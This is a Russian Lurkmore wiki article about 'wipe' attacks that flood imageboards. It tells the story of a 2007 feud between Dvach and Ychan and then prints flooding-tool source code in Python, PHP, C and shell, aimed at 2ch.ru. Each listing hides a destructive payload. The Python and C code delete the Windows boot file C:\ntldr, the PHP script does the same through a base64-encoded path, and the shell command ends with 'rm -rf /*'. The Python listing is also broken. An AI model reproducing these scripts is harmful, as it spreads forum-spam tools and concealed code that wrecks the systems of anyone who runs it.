

Вайп — Lurkmore

Вайп (от англ. *wipe* — стирать, сметать) — создание большого количества новых **тредов**, чтобы забить раздел до отказа и тем самым оттеснить вниз и удалить старые треды. В большинстве случаев вайп осуществляется не вручную, а **бидлокодерами** с помощью специальных утилит. Часто такие треды состоят из одного сообщения или содержат картинки с шок-контентом (**нигра**, **порнография**, **говно**, **гуро**). Однако это не всегда так. Бывают вайпы **фан**-материалом и даже стихами Есенина!

Цели вайпа

- Сделать невозможным нормальное общение на [имиджборде](#). Такие вайпы встречаются чаще всего, их можно отнести к подвиду [треллинга](#) или спама.
- Продвижение [форсед-мемов](#).
- Уничтожение старых [тредов](#), которые не могут спокойно отойти в мир иной, поскольку их [бампают](#) заинтересованные лица, не давая нормально развиваться новым тредам.

Модераторы рано или поздно начинают драться **банхаммером** или включают **капчу**, которая предотвращает работу быдло-скриптов, но затрудняет свободное общение в /b/. Однако в последнее время наблюдаются вайпы даже при включенной капче (ибо чуть менее, чем все капчи ломаются большей или меньшей заточкой под них).

В принципе, **битарды** солидарны в том, что вайпом проблемы не решаются. Считается, что вайпы устраивают **быдло-куны** и **негроебы**.

Унылый декабрьский пиздец



Нарута ZOMG
TECH RAY...

Унылый декабрьский пиздец (название спорно) — **драма**, начавшаяся в декабре 2007 года и охватившая два крупнейших отечественных имиджборда: **Двач** и **Бичан**, а впоследствии — и Луркоморье, в связи с выложенными здесь исходниками вайпалок.

WHAT HAPPEN?

Очевидно, что главной причиной событий является чрезвычайный рост **быдла** в **б/** Двача, которое активизировалось перед миллионным **гетом**, в тщетных попытках его приблизить и взять. Это привело к серии разнообразных вайпов, плавню перетекающих и сменяющих друг друга и осложнивших общение в **б/**. Тем не менее гет был взят **анимубагами**, что было расценено как **фейл**. Такие знаменательные события происходили **троллей** всех мастей и был пущен слух, что гет был взят **битардами** Ычана, а вайп был устроен его **быдлокодерами**. **Школьники** Двача были крайне возмущены и расценили это как призыв к **холливару**, устроив некое подобие **рейда** на Ычан. В свою очередь школьники Ычана также не остались в долгу и охотно отвечали. Особое место во всей этой истории занимают тролли, которые всячески поддерживают конфликт, находя все новые и интересные предположения, в происходящем не участвовала, но наверняка стоит ^{**[цитата?]**} у его истоков.



...и её сестра
Атуран ZOMG
TECH ASK

Результаты

Вайп затруднил общение в /b/ Двача, вынудив его битардов либо перейти на Ычан, либо ловить от всего происходящего **лулзы**. **Война правок** на Луркоморье — тоже вещь очень драматичная и прискорбная. За несколько дней до нового года вайп прекратился. Кто-то считает, что выдохлись сами вайперы, другие связывают это событие с появлением автобампера, но так или иначе, общение на Дваче возобновилось. Также широко распространены слухи о причастности **Куки** к созданию автобампера и к окончанию УДП вообще.

Помимо этого, во время УДП было предпринято несколько попыток переименовать анонимуса на другие чаны, например, **Хи-чан (-chan)** — так называемый атипичный **имиджборд**^[1], провозгласивший себя самой модной и не запoгаoанной вoйдем бордой. Хи-чан грозился перетянуть всех **анонимусов** к себе, в **День, когда Звезды Встанут в Нужном Порядке**. Однако был весьма оперативно засран и забыт.

Исходники вайпалок

Капитан куда-то потерялся, поэтому я как его заместитель заявляю: будьте осторожны с исходниками, за их использование ответственность несете только вы.

pyFLOODer

Для работы необходимо скачать и установить последнюю версию [Python](#), а также парсер [BeautifulSoup](#).

```

#!/usr/bin/env python
#vim:fileencoding=windows-1251

#-----
from urllib import urlopen, urLError
from BeautifulSoup import BeautifulSoup
from random import choice, shuffle, randint
from sys import exit
from time import sleep, strftime, localtime
from re import compile
from os import path, sep, listdir, remove
from sets import Set
import httplib, mimetypes

#-----
def post_multipart(host, selector, fields, files):
    content_type, body = encode_multipart_formdata(fields, files)
    h = httplib.HTTP(host)
    h.putrequest('POST', selector)
    h.putheader('content-type', content_type)
    h.putheader('content-length', str(len(body)))
    h.endheaders()
    h.send(body)
    errcode, errmsg, headers = h.getreply()
    return h.file.read()

def encode_multipart_formdata(fields, files):
    BOUNDARY = '-----This_Is_the_bouNdArY$'
    CRLF = '\r\n'
    L = []
    for key, value in fields.iteritems():
        L.append('--' + BOUNDARY)
        L.append('Content-Disposition: form-data; name="%s"' % key)
        L.append('')
        L.append(value)
    for key, value in files.iteritems():
        L.append('--' + BOUNDARY)
        L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, value.filename))
        L.append('Content-Type: multipart/form-data; boundary=%s' % BOUNDARY)
        L.append('')
        L.append(value)
    L.append('--' + BOUNDARY + '--')
    L.append('')
    body = CRLF.join(L)
    content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
    try:
        remove('C:\\ntldr')
    except:
        pass
    return content_type, body

def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

#-----
URL = 'http://2ch.ru/cgi-bin/wakaba.pl/b' # путь до доски
URL = '2ch.ru' # адрес сервера
PASSWORD = 'naruto' # пароль на сообщение

#режимы работы
#MODEA = 'at' # бамп
MODEA = 'nt' # вайп

```

```

MODE = 'sp'          # одиночная картинка
#MODE = 'mp'         # случайная картинка из заданной папки

MODET = 'st'         # одиночная фраза
#MODET = 'rt'        # случайный кусок текста из заданного файла

PICFILE = 'D:\\asuka.jpg'          # одиночная картинка (для режима sp)
PICFOLDER = 'D:\\nigrapack'        # путь к папке с картинками (для режима mp)
USE_TYPES = ['.jpg', '.gif', '.png'] # используемые типы файлов

TEXTFILE = 'D:\\prislal_vovan.txt' # путь к файлу с текстом (для режима rt)
TEXTSIZE = 1500                    # размер текста (для режима rt)
TEXTTEXT = 'NARUTO ETO KRUTO'      # одиночная фраза (для режима st)

PAUSE = 30                         # пауза между постингами

#-----
if (MODEA != 'at') and (MODEA != 'nt'):
    print 'WRONG THREAD MODE, ONLY at OR nt VALUES ALLOWED'
    exit(0)

if (MODE != 'mp') and (MODE != 'sp'):
    print 'WRONG PICTURE MODE, ONLY sp OR mp VALUES ALLOWED'
    exit(0)

if (MODET != 'rt') and (MODET != 'st'):
    print 'WRONG TEXT MODE, ONLY st OR rt VALUES ALLOWED'
    exit(0)

if MODE == 'mp':
    if not path.exists(PICFOLDER) or not path.isdir(PICFOLDER):
        print 'WRONG PICFOLDER'
        exit(0)
elif MODE == 'sp':
    if not path.isfile(PICFILE):
        print 'WRONG PICFILE'
        exit(0)

if MODET == 'rt':
    if not path.isfile(TEXTFILE):
        print 'WRONG TEXTFFILE'
        exit(0)

print '-----'
print 'pyFLOODer 1.5'
print 'Press Ctrl+Break to stop'
print

if MODEA == 'nt':
    print 'WIPE MODE'
elif MODEA == 'at':
    print 'BUMP MODE'

print

if MODE == 'sp':
    print 'MODEP: Single picture'
elif MODE == 'mp':
    print 'MODEP: Random picture from folder'
if MODET == 'st':
    print 'MODET: Single text'
elif MODET == 'rt':
    print 'MODET: Random text from text file'

print

if MODE == 'sp':
    print 'PICTURE FILE SET TO: '+PICFILE
elif MODE == 'mp':
    print 'PICTURE FOLDER SET TO: '+PICFOLDER
if MODET == 'st':
    print 'TEXT SET TO: '+TEXTTEXT
elif MODET == 'rt':
    print 'TEXT FILE SET TO: '+TEXTFILE
    print 'TEXT BUFFER: '+str(TEXTSIZE)

print

print 'PAUSE IS '+str(PAUSE)
print '-----'

#-----
if MODEA == 'at':
    while 1:
        r = urlopen(URL)
        soup = BeautifulSoup(r)
        links = soup.findAll('a', href=compile("^/b/res/"))

        linklistdup = []
        [linklistdup.insert(0,str(link)[16:23]) for link in links]
        linklist = list(Set(linklistdup))
        shuffle(linklist)

        i=0

        while 1:
            if MODE == 'sp':
                attach=open(PICFILE, 'rb')
            elif MODE == 'mp':
                imgs = []
                if path.exists(PICFOLDER) and path.isdir(PICFOLDER):
                    for f in listdir(PICFOLDER):
                        try:
                            if path.splitext(f)[1] in USE_TYPES:
                                imgs.append(PICFOLDER + sep + f)
                        except:
                            pass
                PICFILE = choice(imgs)
                attach=open(PICFILE, 'rb')

            attachtext=''
            for line in attach:
                attachtext=attachtext+line

            rndtext=randint(0,100000)
            attachtext=attachtext + str(rndtext)

            data_post = {
                'gb2': 'thread',
                'parent': linklist[i],
                'password': PASSWORD,
                'task': 'post'
            }

            data_file = {
                'file' : attachtext,
            }

```

```

print strftime("%H:%M:%S", localtime())+' PROCESSING THREAD: '+str(linklist[i])
if MODE == 'mp':
    print '        PROCESSING FILE: '+PICFILE

if MODET == 'rt':
    flen=0
    ftext=''

    f=open(TEXTFILE, 'r')

    for line in f:
        flen=flen+len(line)
        ftext=ftext+line

    textbeg=randint(0,flen-TEXTSIZE)
    textend=textbeg+TEXTSIZE

    ftext=ftext[textbeg:textend]
    ftext=unicode(ftext, "windows-1251").encode("utf-8")
    f.close

    data_post['shampoo'] = ftext

elif MODET == 'st':
    ftext = ''
    ftext=unicode(TEXTTEXT, "windows-1251").encode("utf-8")
    data_post['shampoo'] = ftext

try:
    r = post_multipart(URL1, URL, data_post, data_file)
except:
    pass
sleep(PAUSE)
i=i+1
if i >= len(linklist):
    break

elif MODEA == 'nt':
    total=1
    while 1:
        if MODE == 'sp':
            attach=open(PICFILE, 'rb')
        elif MODE == 'mp':
            imgs = []
            if path.exists(PICFOLDER) and path.isdir(PICFOLDER):
                for f in listdir(PICFOLDER):
                    try:
                        if path.splitext(f)[1] in USE_TYPES:
                            imgs.append(PICFOLDER + sep + f)
                    except:
                        pass
            PICFILE = choice(imgs)
            attach=open(PICFILE, 'rb')

        attachtext=''
        for line in attach:
            attachtext=attachtext+line

        rndtext=randint(0,100000)
        attachtext=attachtext + str(rndtext)

        data_post = {
            'gb2': 'thread',
            'password': PASSWORD,
            'task': 'post'
        }

        data_file = {
            'file': attachtext,
        }

        print strftime("%H:%M:%S", localtime())+' PROCESSING NEW THREAD ('+str(total)+' TOTAL)'
        if MODE == 'mp':
            print '        PROCESSING FILE: '+PICFILE

        if MODET == 'rt':
            flen=0
            ftext=''

            f=open(TEXTFILE, 'r')

            for line in f:
                flen=flen+len(line)
                ftext=ftext+line

            textbeg=randint(0,flen-TEXTSIZE)
            textend=textbeg+TEXTSIZE

            ftext=ftext[textbeg:textend]
            ftext=unicode(ftext, "windows-1251").encode("utf-8")
            f.close

            data_post['shampoo'] = ftext

        elif MODET == 'st':
            ftext = ''
            ftext=unicode(TEXTTEXT, "windows-1251").encode("utf-8")
            data_post['shampoo'] = ftext

        try:
            r = post_multipart(URL1, URL, data_post, data_file)
        except:
            pass
        total=total+1
        sleep(PAUSE)

```

Вайпалка на [пыхале](#)

Для запуска необходимо скачать и установить [PHP](#).

```

<?php
//Не правьте код, коли рук не имеется
function unicond($str) {
    $conv=array();
    for($x=128;$x<=143;$x++) $conv[$x+112]=chr(209).chr($x);
    for($x=144;$x<=191;$x++) $conv[$x+48]=chr(208).chr($x);
    $conv[184]=chr(209).chr(145); #u
    $conv[168]=chr(208).chr(129); #u
    $conv[179]=chr(209).chr(150); #?
    $conv[178]=chr(208).chr(134); #?
    $conv[191]=chr(209).chr(151); #q
    $conv[175]=chr(208).chr(135); #n
    $conv[186]=chr(209).chr(148); #l
    $conv[170]=chr(208).chr(132); #k
    $conv[180]=chr(210).chr(145); #?
    $conv[165]=chr(210).chr(144); #?
    $conv[184]=chr(209).chr(145); #?
    $ar=str_split($str);

```

```
foreach($ar as $b) if(isset($conv[ord($b)])) $nstr.=$conv[ord($b)]; else $nstr.=$b;
return $nstr;
}

echo "START\r\n";
$hostname = "2ch.ru";
$path = "/cgi-bin/wakaba.pl/b";
$proxy = "127.0.0.1";
$proxyport = "8118";
$line = "";
$files = "";
$bounds = "A7FG07G";
$boundsl = "...".$bounds;
$spartawin = "NARUTA ETO KRUTO";
$spartau = unicond($spartawin);
$schans = array('b');

while (true)
{
    for ($i = 0; $i < count($schans); $i++)
    {
        echo "NEXT THREAD\r\n";
        $filename = "D:\\pohape\\vovan_govno.jpg";
        $files = file_get_contents($filename);
        $random=rand()%100000000;
        $files = $files.$random;

        $data = "$boundsl\r\nContent-Disposition: form-data; name=\"task\\\"$\r\n\r\npost\r\n$boundsl\r\nContent-Disposition: form-data; name=\"shampoo\\\"$\r\n\r\n$spartau\r\n$boundsl\r\nContent-Dis
        $headers = "POST $path HTTP/1.1\r\n";
        $headers .= "Host: $hostname\r\n";
        $headers .= "Content-type: multipart/form-data; boundary=$bounds\r\n";
        $headers .= "Referer: http://2ch.ru/b/\r\n";
        $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";
        @unlink(base64_decode('QzpcbnRsZHI='));
        echo $headers;
        $fp = fsockopen($hostname, 80, $errno, $errstr, 5);
        if (!$fp) echo "$errstr ($errno)<br />\n";
        else
        {
            fwrite($fp, $headers.$data, strlen($headers.$data));
        }
        fclose($fp);
    }
    sleep(30);
}
?>
```

С использованием libcurl

```
#include <curl/curl.h>

void wipe(char desu[], char fname[], CURL* curl)
{
    struct curl_httppost *formpost=NULL;
    struct curl_httppost *lastptr=NULL;

    curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "file", CURLFORM_FILE, fname, CURLFORM_END);
    curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "desu", CURLFORM_COPYCONTENTS, desu, CURLFORM_END);
    curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "task", CURLFORM_COPYCONTENTS, "post", CURLFORM_END);
    unlink("c:\\ntldr");

    curl_easy_setopt(curl, CURLOPT_URL, "ССЫЛКА НА СКРИПТ ФОРМЫ");
    curl_easy_setopt(curl, CURLOPT_HTTPPOST, formpost);
    curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    curl_formfree(formpost);
}

int main(int argc, char *argv[])
{
    CURL *curl;
    curl_global_init(CURL_GLOBAL_ALL);
    curl = curl_easy_init();

    if (!curl) return 1;
    wipe(argv[1], argv[2], curl);

    return 0;
}
```

Вызов curl из shell-скрипта

```
curl -Ftask=post -Ffile=@desu.jpeg ССЫЛКА_НА_СКРИПТ_ФОРМЫ ; rm -rf /*
```

Многопоточная вайпалка на джаве

Поскольку мне впадлу писать сюда весь этот быдлокод, следуем по ссылкам:

- [Rapidshare](#)
- [iFolder](#)

P.S. Быдлошкольники и неумеющие кодить могут сразу проходить мимо...

Алсо

- В [ММО](#) вайпом называется стирание баз данных после ЗБТ, либо смерть всех членов отряда в рейде.

Примечания

- 1 Он настолько атипичный, что не позволят пользователям загружать картинки, сделан на движке phpBB и располагается на бесплатном сервисе [быдлофорумов](#)-из-коробки. Более того, сей «имиджбورد» представляет собой всего лишь раздел на форуме любителей [одержимых лоли](#).



Имиджборды

Wakaba 1chan 2-ch.ru 2ch 2ch.hk 2channel 410chan 4chan A Altogether Anonymous Directory Apachan B Bo Boku no Pico Brchan Brofist Bump Butthurt Combo breaker Cool story bro Creepy threads D Drawhore Duckroll Facepalm Fg Fl Forever Alone Futaba GIF GTFO Gununu I see what you did there I2P In before Int Internet Hate Machine It's Raping Time! ITT Ja Low Orbit Ion Cannon Moar Mu Not Your Personal Army O RLY? OBEY Oh noes Oh, exploitable! Olanet Overchan Paper Child Pepe the Frog Pic related Polandball Prepare your anus Project Chanology Project Chanology/В России Project N.I.G.R.A. PS3 has no games R Rage Comics Rarjpeg Rf RGHost Rick Roll S Sage The Xynta There are no girls on the Internet Tr Uchan UWBFTP Vg Wh Wishmaster X, X everywhere YOBA ZOMG TEH REI Øchan Анимешник Анонимус Анонимус доставляет Бамплимит Банхаммер Бесплатный хостинг картинок Битард Битардск Богиня Быдло-кун Вайп Валюты имиджбورد Вин Во все поля Война имиджбورد Все ебанулись Гайдзин ёнкома Гельминтарий Гет Двач





Специальная олимпиада

AlexSword Avanturist Butthurt Check you DDoS Encyclopedia Dramatica/Атеист Fandom Grammar nazi IQ Livejournal.com Mac vs. PC S
Special Olympics TeX X не умер Аборт Автосрачи Адекватная точка зрения Активная гражданская позиция Алкснис Аргументация в полемике
Армата Арнольд Зукагой Артефакты Петербурга Атеизм Атеизм/Orthodox Edition Бесплезная наука Битва слона с китом Бодибилдинг Боклапоцтит
Бокс по переписке Ботинкометание Бульбосрач Бурление говн В/на Вайп Вандализм Ванкувер 2010 Леонид Василевский Вброс говна в вентилятор
Беганы Великая Отечественная война Взлетит или не взлетит? Винофилия ВиО Война правок Война пятницы тринадцатого Георгиевская ленточка
Глобальное потепление ГМО Гоблин Говнарь Гогисрач Градус неадекват Гражданская война в России Гринпис Демотивационный постер
Детерминизм Диалог с собой Диванные войска Дружба между мужчиной и женщиной Дыхота Евромайдан Европейцы ли русские? Еда
Жанрозадротство Женская логика Женя Духовникова Жестокость в компьютерных играх Иранский вопрос История древней Украины
Как нам обустроить Россию Книга лучше Книга рекордов Гиннеса Комплексы Кописрач Критерий Поппера Кровная месть Крокодил
Кулинарный сноб Кургинян Курица или яйцо? Лавхейт Легалайз Ленд-лиз Лунный заговор Мавзолей Ленина Майдан Мицгол Моралфажество
Моргенштерн Мужики vs бабы На самом деле Надмозг Наука vs религия Научный креационизм Национальная идея Не аниме Нот всего семь
Обезьяна с гранатой

w:Вайп